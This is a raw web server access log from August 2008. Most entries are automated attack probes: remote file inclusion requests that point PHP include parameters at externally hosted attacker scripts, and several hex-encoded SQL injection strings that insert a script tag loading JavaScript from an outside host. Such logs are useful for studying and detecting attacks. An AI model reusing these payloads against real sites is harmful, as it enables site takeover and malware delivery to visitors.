91.186.30.30 - - [17/Aug/2008:02:30:22 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:02:31:47 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:02:31:47 -0500] "GET //include/admin.lib.inc.php?site_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
87.230.21.231 - - [17/Aug/2008:02:33:23 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://marancia.altervista.org/NuovaCartella/pino.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
87.230.21.231 - - [17/Aug/2008:02:33:23 -0500] "GET //?path%5Bdocroot%5D=http://marancia.altervista.org/NuovaCartella/pino.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
87.230.21.231 - - [17/Aug/2008:02:33:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://marancia.altervista.org/NuovaCartella/pino.txt?? HTTP/1.1" 200 95586 "-""libwww-perl/5.803"
200.251.46.29 - - [17/Aug/2008:02:33:39 -0500] "GET /logs/access_log.1214438400//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
200.251.46.29 - - [17/Aug/2008:02:33:39 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
200.251.46.29 - - [17/Aug/2008:02:33:40 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
208.88.52.205 - - [17/Aug/2008:02:34:37 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.813"
208.88.52.205 - - [17/Aug/2008:02:34:37 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.813"
206.252.131.151 - - [17/Aug/2008:02:34:42 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:02:34:42 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:02:34:42 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
89.186.1.54 - - [17/Aug/2008:02:35:10 -0500] "GET /logs/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
89.186.1.54 - - [17/Aug/2008:02:35:10 -0500] "GET /errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
89.186.1.54 - - [17/Aug/2008:02:36:34 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
89.186.1.54 - - [17/Aug/2008:02:36:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
89.186.1.54 - - [17/Aug/2008:02:37:39 -0500] "GET /logs/phphtml.php?htmlclass_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
89.186.1.54 - - [17/Aug/2008:02:37:39 -0500] "GET /phphtml.php?htmlclass_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.800"
193.142.215.12 - - [17/Aug/2008:02:41:41 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
193.142.215.12 - - [17/Aug/2008:02:41:41 -0500] "GET //config/dbutil.bck.php?confdir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
64.105.33.158 - - [17/Aug/2008:02:42:00 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:02:42:03 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:02:42:03 -0500] "GET //config/dbutil.bck.php?confdir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
67.15.186.5 - - [17/Aug/2008:02:43:03 -0500] "GET /logs/access_log.1214438400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
221.225.56.177 - - [17/Aug/2008:02:43:57 -0500] "GET /logs/access_log.1181001600?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 198429 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
221.225.56.177 - - [17/Aug/2008:02:43:58 -0500] "GET /logs/access_log.1181001600?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 198429 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.6.22.107 - - [17/Aug/2008:02:44:07 -0500] "GET /logs/access_log.1166140800 HTTP/1.0" 200 160866 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.134 - - [17/Aug/2008:02:44:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [17/Aug/2008:02:44:26 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.111.176.64 - - [17/Aug/2008:02:44:42 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
89.111.176.64 - - [17/Aug/2008:02:44:42 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.111.176.64 - - [17/Aug/2008:02:44:42 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
64.105.33.158 - - [17/Aug/2008:02:45:17 -0500] "GET /logs/access_log.1213488000/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.142.215.12 - - [17/Aug/2008:02:46:19 -0500] "GET /logs//include/write.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
193.142.215.12 - - [17/Aug/2008:02:46:19 -0500] "GET //include/write.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
77.232.68.17 - - [17/Aug/2008:02:46:39 -0500] "GET /logs//include/write.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:02:46:39 -0500] "GET //include/write.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.197.234.53 - - [17/Aug/2008:02:47:42 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/id44.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
66.197.234.53 - - [17/Aug/2008:02:47:43 -0500] "GET /index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/id44.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
67.15.186.5 - - [17/Aug/2008:02:52:02 -0500] "GET /logs/access_log.1214179200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
212.26.146.248 - - [17/Aug/2008:02:52:53 -0500] "GET /logs/access_log.1193270400/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
212.26.146.248 - - [17/Aug/2008:02:52:53 -0500] "GET /logs/access_log.1193270400/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
212.26.146.248 - - [17/Aug/2008:02:52:53 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
212.26.146.248 - - [17/Aug/2008:02:52:54 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
212.26.146.248 - - [17/Aug/2008:02:52:54 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
212.26.146.248 - - [17/Aug/2008:02:52:54 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
139.146.145.67 - - [17/Aug/2008:02:53:13 -0500] "GET /logs/access_log.1214524800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:53:13 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:53:14 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
193.142.215.12 - - [17/Aug/2008:02:54:25 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
193.142.215.12 - - [17/Aug/2008:02:54:25 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
77.79.246.241 - - [17/Aug/2008:02:55:10 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.808"
77.79.246.241 - - [17/Aug/2008:02:55:11 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
139.146.145.67 - - [17/Aug/2008:02:56:45 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart_content.php?cart_isp_root=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:56:46 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:56:46 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:56:47 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:56:52 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart_content.php?cart_isp_root=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:56:52 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
82.215.162.43 - - [17/Aug/2008:02:57:00 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.apnic.net/index.html? HTTP/1.0" 404 315 "-""Mozilla/5.0"
67.15.186.5 - - [17/Aug/2008:02:57:22 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
89.248.110.152 - - [17/Aug/2008:02:59:06 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.215.162.43 - - [17/Aug/2008:02:59:07 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.apnic.net/index.html? HTTP/1.0" 404 315 "-""Mozilla/5.0"
89.248.110.152 - - [17/Aug/2008:02:59:07 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
78.50.206.158 - - [17/Aug/2008:02:59:08 -0500] "GET /logs/access_log.1206230400?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
78.50.206.158 - - [17/Aug/2008:02:59:09 -0500] "GET /logs/access_log.1206230400?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
91.186.30.30 - - [17/Aug/2008:03:00:38 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:03:00:39 -0500] "GET //index.php?DOCUMENT_ROOT=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:03:00:39 -0500] "GET /logs/errors.php?error=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:03:00:41 -0500] "GET /errors.php?error=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.142.215.12 - - [17/Aug/2008:03:01:04 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://64.251.8.142/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
193.142.215.12 - - [17/Aug/2008:03:01:05 -0500] "GET //Neos_Chronos/header.php?base_folder=http://64.251.8.142/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
77.232.68.17 - - [17/Aug/2008:03:02:05 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:03:02:05 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
91.186.30.30 - - [17/Aug/2008:03:02:55 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:03:02:55 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
122.49.120.85 - - [17/Aug/2008:03:02:59 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
122.49.120.85 - - [17/Aug/2008:03:02:59 -0500] "GET ///vwar/backup/errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
122.49.120.85 - - [17/Aug/2008:03:03:00 -0500] "GET /logs///vwar/backup/errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
77.232.68.17 - - [17/Aug/2008:03:03:11 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://64.251.8.142/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:03:03:11 -0500] "GET //Neos_Chronos/header.php?base_folder=http://64.251.8.142/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
203.251.80.230 - - [17/Aug/2008:03:03:39 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:03:03:39 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
203.98.87.14 - - [17/Aug/2008:03:04:20 -0500] "GET /logs/access_log.1213488000//?mosConfig_absolute_path=http://www.mta.cl/phpform/use/coco.txt????????? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
203.98.87.14 - - [17/Aug/2008:03:04:21 -0500] "GET //?mosConfig_absolute_path=http://www.mta.cl/phpform/use/coco.txt????????? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
203.98.87.14 - - [17/Aug/2008:03:04:26 -0500] "GET /logs//?mosConfig_absolute_path=http://www.mta.cl/phpform/use/coco.txt????????? HTTP/1.1" 200 95586 "-""libwww-perl/5.79"
62.109.176.109 - - [17/Aug/2008:03:04:47 -0500] "GET /logs/access_log.1193270400/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:03:04:49 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:03:04:51 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
67.195.37.153 - - [17/Aug/2008:03:05:38 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2819 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.84.182.98 - - [17/Aug/2008:03:05:58 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
70.84.182.98 - - [17/Aug/2008:03:05:58 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
122.49.120.85 - - [17/Aug/2008:03:06:03 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
70.84.182.98 - - [17/Aug/2008:03:06:09 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
70.84.182.98 - - [17/Aug/2008:03:06:10 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
70.84.182.98 - - [17/Aug/2008:03:06:20 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
91.186.30.30 - - [17/Aug/2008:03:06:20 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
